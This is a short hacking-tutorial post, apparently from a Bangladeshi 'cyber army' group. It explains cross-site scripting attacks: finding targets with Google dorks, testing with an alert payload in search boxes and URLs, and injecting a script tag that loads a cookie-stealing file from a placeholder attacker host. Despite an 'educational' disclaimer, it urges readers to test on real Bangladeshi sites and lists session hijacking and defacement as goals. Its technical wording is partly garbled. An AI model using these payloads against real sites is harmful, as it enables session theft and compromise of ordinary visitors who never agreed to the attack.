Rules for hacking websites.

 Rules for hacking websites.

Today I will talk to you about the method of hacking the website called XSS or cross-site scripting method you can hack the website . Note: I or this group will not take the responsibility if anyone does bad things through this post just for use in educational work. And don't forget to test on Bangladeshi site.

Step 1: Find vulnerable web sites.

A hacker first finds a vulnerable site. That's why he first goes to Google. He then uses Google Dorks to find vulnerable sites. Then search with sql Injection below.

"search? q ="

Then you will find many vulnerable sites. Now enter a site.

Step 2: Test for vulnerability.

Now we will check the Vulnerability of the site that we have entered. For this you first need to find the ABT post or parameter of the site. Got it? If you don't understand, wait a minute, I say. This means you will find a post that will be sent to the site's server. E.g. search query, username, password.

There are two methods for testing vulnerability.

Method 1: The first method is to inject in the main search box of the site.

A hacker usually writes a malcious script in the main search box of the site, then clicks on the search button. As soon as the search is done, the malcious script starts working on the website.

Method 2: Injection to the site URL.

It does not work in any search box. It only works on site URLs. For example : - http: // vulnerablewebsite / search? Q = malicious_script_goes_here Enter the following code as input fields for convenience.

<script> alert ('hi'); </script>

Now you can check with the above code. For example: - First method: You search by typing the above code in the main search box of your victim's site.

Method 2: You enter the link to the victim's site. E.g.

http: // vulnerablewebsite / search? q = <script> alert ('TunerPage'); </script>

Now if a pop up box written 'TunerPage' appears . If you understand that this site XSS for the vulnerable.

Step 3: Give Malicious Scripts.

After testing the vulnerability, a hacker's next task is to inject malicious scripts into the victim's site. This will help in stealing cookies and malware attack from the quote site. Now suppose there is a cookie stealing script on the hacker's site. Then its malicious script url

http: //attackerSite/malicious.js

Now the hacker can inject his malcious script into the vulnerable site. Then its URL

<script src = http: //attackerSite/malicious.js> </script>

Then whenever a visitor to that site visits that site, the malcious script will start working and start stealing cookies. There are generally two types of persisting capability according to the capacity of XSS.

One is Persistent and the other is Non-Persistent

Persistent XSS:

This is the most risky XSS vulnerability. It stores data directly from the server. So whenever you give malicious script injection on that site, it will be saved permanently in the web application. This will show it to all other visitors. If you inject malicious scripts on your victim's web site, it also infects visitors to the site. For example, there are some sites that save search queries to tack users on their site. The result is permanent storage of XSS.

Non-Persistent XSS:

Many people call it Reflected XSS. That is why malicious script is temporary here. As a result, ordinary visitors will not be able to see your script. But yes, hackers use injection tips to show visitors the script they give them. Interestingly, those who are regular visitors to the site but think that it is the site's own link. As a result, they go there and are also victims of hacking the site. For example: - If you search for anything on some sites, you will see that the search string given to you is showing you again. This is why malicious code temporarily.

What does a hacker do with this vulnerability?

1 / Stealing identity cards and various confidential information.

2 / Bypassing restriction of the website

3 / Session Hijacking

4 / Malware Attack

5 / Website Defacement

৬ / Dos attacks

Hope everybody on this site also had a great day!

Hopefully today's post was very helpful, and if you have any questions about this, you can leave me in the comment box. And you must let us know how you like today's post through comments and try to share this post as much as possible.

And stay tuned to Sabuj Bangla TV YouTube channel for such interesting and amazing, real, information technology related information. So many thanks so far today for bothering to read this post to the end. Hope everybody on this site also had a great day.  Stay  well, stay healthy, stay safe with Sobuz  Bangla Cyber ​​Army . Thanks. God bless you.  

Green  Bangla  TV YouTube Channel Link : -

https://www.youtube.com/channel/UCt2TKd4f6oQrzWh-GASXxPw?pbjreload=102